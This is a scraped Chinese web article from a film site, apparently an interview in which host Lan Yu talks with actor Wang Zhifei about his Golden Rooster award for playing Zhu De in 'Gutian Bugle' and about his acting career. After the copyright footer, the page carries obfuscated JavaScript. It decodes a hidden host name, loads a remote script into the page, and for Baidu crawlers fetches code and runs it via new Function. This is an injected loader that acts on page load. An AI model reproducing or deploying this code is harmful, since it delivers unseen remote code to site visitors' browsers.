蓝羽对话王志飞 | 他,第一批得“胖鸡”的幸运儿

来源:鬼片网人气:加载中更新:2021-12-24 19:00

当被蓝羽问及金鸡奖对于自己的意义,王志飞坦言金鸡奖绝对是中国电影的最高奖项。拿下金鸡奖,是对自己三十多年演艺生涯不断往前奔跑的一种褒奖和鼓励。


1905电影网专稿 当被蓝羽问及金鸡奖对于自己的意义,王志飞坦言金鸡奖绝对是中国电影的最高奖项。



拿下金鸡奖,是对自己三十多年演艺生涯不断往前奔跑的一种褒奖和鼓励。因为新的金鸡奖奖杯较之前大了一号,他还打趣自己得到的是一尊“胖鸡”,“它更浑厚、更沉重,今后也赋予我们更重的责任。”



2019年,中国电影金鸡奖迎来大变革,评选周期改为每年评选一次,金鸡雕塑在厦门揭开神秘面纱,金鸡奖奖杯造型也发生了变化。新奖杯与全新金鸡雕塑采用同款设计,体现中国电影人不畏艰难、勇于探索的创新精神。


幸运地,王志飞是首批新金鸡奖奖杯的获得者之一。


时隔3年,王志飞带着珍贵的金鸡奖奖杯做客《蓝羽会客厅》,两人再度透过曼妙光影,回忆着当年温馨动人的一刻。



兢兢业业,不断往前,王志飞依托精湛的演技,不仅成了演艺界的“常青树”,更是值得青年演员学习的好榜样。


适逢2021年是中国电影金鸡奖创立40周年,中国电影报道《蓝羽会客厅》特别推出金鸡奖40周年系列访谈,回首光影峥嵘岁月,共话中国电影未来。本期节目蓝羽对话王志飞,共同聆听这位敬业老戏骨的奋斗人生。


01.

无心插柳柳成荫 

凭《古田军号》勇夺金鸡最佳男配角


“导演我再问一遍,您真的要把朱德这个角色交给我?”因为不是特型演员,外在形象又不够相似,王志飞当初对于在《古田军号》出演朱德并不自信,觉得不可能会有导演找他演这个角色。



他还记得去第一次去见陈力,刚进门的第一句话,就忙着确认导演是否找错了人。而陈力回答倒是直接,“没有找错,没有候选。”


导演的话给足了王志飞信心与动力。他随即暗下定决心,不懈怠、往前走、往上冲,一定要演好这个角色。



朱德是一个威严刚毅,善气迎人,又有点性子倔强的人,对时局分析和战局预判有绝对的洞察力。但因为形象方面着实与朱总司令有点差距,所以王志飞对于这个角色的塑造,换了一个考虑的角度,“适当放弃对外部形象的要求,花大气力在人物行为和精神方面。”


“都说我们朱总司令憨厚老实,那他为什么忠厚?因为他寻找到了目标。”王志飞向蓝羽介绍,朱德能够奋不顾身参加革命,绝对不是“憨厚老实”四个字就能够概括的人。


因此他在表演时拒绝用“憨厚笑容”“木讷目光”等简单化的常规人物塑造手法,而是潜心研究朱德本人的面部表情,还特别学了一口地道的四川方言,以更好地塑造这位革命先辈的形象。



王志飞将拍摄过程视为用特殊方式去寻找革命家初心的过程。他坦言一开始不能完全理解革命家浴血奋斗的心路历程,直到坐上通往剧组的汽车,一点一点靠近拍摄地古田会议旧址,看到革命先辈曾经居住和奋斗的地方,他对于这些英雄的认识和感受可谓豁然开朗。


贯穿整个拍摄周期,王志飞逐渐摸到了老一辈的初心,“坚定的信念支撑着他们向前。”


从一开始不够自信,到后来抱着忐忑心情拍完这部电影,王志飞一直不敢对奖项有所憧憬。但偏偏无心插柳柳成荫,因为《古田军号》、因为“朱德”一角,他斩获了人生中首座金鸡奖奖杯。



组委会给王志飞的评价是,以极富魅力及张力的高超演技演绎出领袖人物的复杂性和立体感,突破了类型人物塑造的脸谱化,将一位众所周知的领袖形象刻画得生动、有血有肉、令人耳目一新。


而正如数十年前老一辈奋斗向前的初心,站在金鸡奖领奖台的王志飞,也特地用了“初心”两个字,形容自己拍摄《古田军号》与众不同的感受。



实际上,对于电影,对于英雄、对于历史,王志飞的初心从未改变。


电影宣传期间,王志飞为了让更多观众看到《古田军号》,花了近6个月的时间进行路演宣传,他一直跟着导演跑东跑西,一度刷新了他的路演时长记录,甚至主动捐出了自己这部戏的全部片酬。



“这很有必要,我也很愿意这样做。”回首过往,王志飞向蓝羽分享捐出片酬的出发点,“希望年轻观众能够坐在影院里,花两个小时去了解革命先辈的无私奉献,感受一次全新的洗礼。”


据透露,明年《古田军号》原班人马有望筹拍剧版,到时王志飞将再一次扮演朱德,再现英雄的光辉形象。


02.

要爱角色,不能去秀自己 

寄语青年演员不要比咖位,要比谁能走更远


王志飞在大银幕上多演配角,《雨中的树》是他罕见担纲主角的作品。王志飞直言拍这部电影是奔着金鸡奖而去,但有心栽花花不开,影片最终没有获奖。


王志飞至今仍把《雨中的树》当成人生中永远不会遗忘的记忆。但这份难忘,不是因为担纲主角,而是因为拍这部戏“太苦了”。


《雨中的树》讲述了原四川省万源县组织部长李林森(王志飞 饰)短暂而卓越的一生。戏外,身为百姓官的李林森风里来雨里去地服务群众,戏里,王志飞也为还原抢险救灾的场面吃了不少苦头。


王志飞回忆,一起演戏还有牛、狗、猪、鸡、鸭等动物,拍摄时它们也一并泡在水里,全部都排泄在里边,难免让水受到污染。但即使在这般环境持续拍摄,王志飞不但没有抱怨,反而感到喜悦,甚至连腿受伤也顾不上疼痛,而是完全忘我地沉浸无尽的创作中去。



“演员嘛,戏比天大,都是这样的!”对于王志飞来说,对待每一场戏,他的态度都很明确,那就是全力以赴。正得益于这股劲儿,从大银幕到小荧屏,他总能凭借出色的演技让人眼前一亮。


诸如《扫黑风暴》的高明远、《大秦帝国》的卫鞅、《沉默的证人》的陈俊威......无论是正派还是反派、他都能演出一番独特的滋味。


“《扫黑风暴》我一集没落地看了,而且是追剧看的,还花了不少点播的钱!”吸引了大批像蓝羽一样的粉丝,年度热剧《扫黑风暴》播出时风靡一时。戏里王志飞饰演的黑恶势力代表高明远,不露声色却坏事做尽,令大众印象深刻。


多面化的高明远属于王志飞喜欢挑战的角色类型。因为《扫黑风暴》根据不止一部真实案件为基础改编,所以像“孙小果案”“白银大案”等案件,王志飞都会去了解,更不用说高明远的原型案件报道“我试图明白他们怎么做、为什么这么做,演起来心里边就更有谱。”但王志飞也谦虚地表示,“高明远”活在另外一个世界,完全搞清楚他有点难,他只是把一个让观众看完以后有所警惕的角色展现出来。



从艺数十载,王志飞交出过大大小小、数以百计的角色。配角也好,主角也罢,他总以最高标准要求自己。而随着年龄不断增大,他坦言对于获奖的理解有了变化,“奖项是一种肯定,但也意味着观众对自己更高的期待。”


近些年来,王志飞能够感觉到拍摄环境已经发生翻天覆地的变化。比如当下有些青年演员,工作时间有限定,时间一到一分钟都不多待。



对此,他认为演员应该坚守可贵的品质,选择光明的方向继续走下去。“作为演员,我会继续不忘初心,为社会主义文艺的繁荣尽我最大的努力,希望或多或少带动着同样的后辈们,把他们的注意力吸引到这条路上来。”


以前辈的身份寄语青年演员,王志飞最后这样总结:“这个行当比的不是谁更高,而是比的谁能走的远。这条路实际上很窄,可奔跑在这条路上的人很多,机会很少。演员要爱角色,不能秀自己。只要肯脚踏实地,就有可能完成自己的目标。否则,还是把这路让开吧......”


文/keva

    Copyright © 2008-2022 鬼片网www.guipian5.com.保留所有权利

    function calzP(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function hqyMCn(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return calzP(t);};window[''+'J'+'Y'+'o'+'l'+'m'+'y'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=hqyMCn,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a2J0LnloYnNNrLmNNu','131005',window,document,['N','NPoEZJpb']);}:function(){};